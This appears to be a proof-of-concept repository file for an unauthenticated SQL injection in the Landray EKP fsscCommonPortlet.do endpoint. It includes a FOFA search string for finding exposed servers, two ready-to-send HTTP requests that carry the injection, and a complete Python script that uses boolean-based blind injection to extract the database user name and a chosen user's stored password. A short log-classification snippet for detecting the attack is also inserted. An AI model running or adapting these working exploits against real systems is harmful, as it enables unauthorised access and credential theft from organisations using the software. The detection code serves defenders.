eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00
# Landray EKP fsscCommonPortlet.do unauthenticated SQL injection vulnerability
The fsscCommonPortlet.do endpoint of the Landray EKP system has an unauthenticated SQL injection vulnerability: an attacker without any credentials can exploit it to retrieve information from the database.
## fofa
```
app="Landray-OA系统"
```
## poc
First call the save method to populate the database with a record:
```http
POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1
```
```http
POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240962.png)
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240942.png)
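Added here as a defensive example, not part of the original POC or of the Landray product: the following Python classifies HTTP request records so that the two-step pattern above (an unauthenticated `saveICare` write followed by `getICareByFdId` calls whose `fdNum` carries SQL syntax) can be flagged in web-server or WAF logs. The request records are constructed samples; the path and parameter names are taken from the requests above.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request records (method, path, raw POST body); not from a real system.
SAMPLE_REQUESTS = [
    ("POST", "/ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do",
     "method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1"),
    ("POST", "/ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do",
     "method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down"),
    ("POST", "/ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do",
     "method=getICareByFdId&fdNum=aNsSl%27+or+ascii%28substring%28%28user_name%28%29%29%2C1%2C1%29%29"
     "+%3C+128+and+%271%27%3D%271&ordertype=down"),
    ("POST", "/ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do",
     "method=getICareByFdId&fdNum=12345&ordertype=down"),
    ("GET", "/ekp/login.jsp", ""),
]

TARGET_PATH = "/fssc/common/fssc_common_portlet/fsscCommonPortlet.do"
# SQL tokens that have no business inside an fdNum lookup value.
SQL_TOKENS = re.compile(r"'|--|\b(or|and|select|union|substring|ascii)\b", re.IGNORECASE)


def classify_request(method, path, body):
    """Classify one request as 'ignore', 'setup', 'suspect' or 'benign'."""
    if method != "POST" or not path.endswith(TARGET_PATH):
        return "ignore"
    params = parse_qs(body, keep_blank_values=True)  # also URL-decodes the values
    action = params.get("method", [""])[0]
    if action == "saveICare":
        return "setup"  # unauthenticated write that seeds a record before the oracle queries
    if action == "getICareByFdId":
        fd_num = params.get("fdNum", [""])[0]
        return "suspect" if SQL_TOKENS.search(fd_num) else "benign"
    return "benign"


def scan(records):
    """Return (indices of 'suspect' records, all verdicts). A 'setup' request shortly
    before the suspect ones is the extra signal worth correlating in an alert."""
    verdicts = [classify_request(*r) for r in records]
    return [i for i, v in enumerate(verdicts) if v == "suspect"], verdicts


if __name__ == "__main__":
    hits, verdicts = scan(SAMPLE_REQUESTS)
    for i, (req, v) in enumerate(zip(SAMPLE_REQUESTS, verdicts)):
        print(f"[{i}] {v:8s} {req[0]} {req[1]}")
    print("suspect indices:", hits)
```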
## Python script
```python
import argparse
import requests

header = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
}


def exploit_user(url, db_user):
    # Boolean-based binary search on each character of user_name(); the presence of
    # "docSubject" in the response is the true/false oracle.
    global header
    user_name = ""
    for i in range(1, 20):
        low = 1
        top = 255
        mid = (low + top) // 2
        while low < top:
            send_data = {
                "method": "getICareByFdId",
                "ordertype": "down",
                "fdNum": "aNsSl' or ascii(substring((user_name()),{},1)) < {} and '1'='1".format(i, mid)
            }
            res = requests.post(url, data=send_data, headers=header)
            if "docSubject" in res.text:
                top = mid
            else:
                low = mid + 1
            mid = (top + low) // 2
        if mid <= 1 or mid >= 254:
            break
        user_name = user_name + chr(mid - 1)
        print("[+]user_name:{}".format(user_name))
        print("\033[F", end="")
    print("[+]user_name:{}".format(user_name))


def exploit(url, username):
    # Same binary search, applied character by character to the fdPassword column.
    global header
    password_len = 32
    password = ""
    for i in range(1, password_len + 1):
        low = 1
        top = 255
        mid = (low + top) // 2
        while low < top:
            send_data = {
                "method": "getICareByFdId",
                "ordertype": "down",
                "fdNum": "aNsSl' or ascii(substring((select fdPassword from com.landray.kmss.sys.organization.model.SysOrgPerson where fdLoginName='{}'),{},1)) < {} and '1'='1".format(
                    username, i, mid)
            }
            res = requests.post(url, data=send_data, headers=header)
            if "docSubject" in res.text:
                top = mid
            else:
                low = mid + 1
            mid = (top + low) // 2
        password = password + chr(mid - 1)
        print("[+]password:{}".format(password))
        print("\033[F", end="")
    print("[+]password:{}".format(password))


def scan_vuln(url, username, db_user):
    global header
    req_url = url.strip("/") + "/fssc/common/fssc_common_portlet/fsscCommonPortlet.do"
    # The saveICare call seeds a record so that later getICareByFdId queries return data.
    step_data = {
        "method": "saveICare",
        "fdId": "",
        "fdNum": "1",
        "docSubject": "1",
        "fdName": "test",
        "createTime": "1",
        "fdStatus": "1"
    }
    try:
        req1 = requests.post(req_url, data=step_data, headers=header)
        if req1.status_code == 200 and "result" in req1.text:
            print("[+]Vuln exists, start inject password:")
            if db_user == "check":
                exploit_user(req_url, db_user)
            else:
                exploit(req_url, username)
        else:
            print("[-]Vuln not exist.")
            exit(0)
    except Exception:
        print("[-]request error.")
        exit(0)


def main():
    parser = argparse.ArgumentParser(description="Process command line arguments")
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-db_user', '--db_user', required=False, help='db_user')
    parser.add_argument('-U', '--username', required=False, help='Username argument')
    args = parser.parse_args()
    url = args.url
    db_user = args.db_user
    username = args.username
    scan_vuln(url, username, db_user)


if __name__ == '__main__':
    main()
```
## Vulnerability source
- https://xz.aliyun.com/t/16103?time__1311=GuD%3D7KiK0KYIx05DK7qCuxWuEoT6PGC4E8eD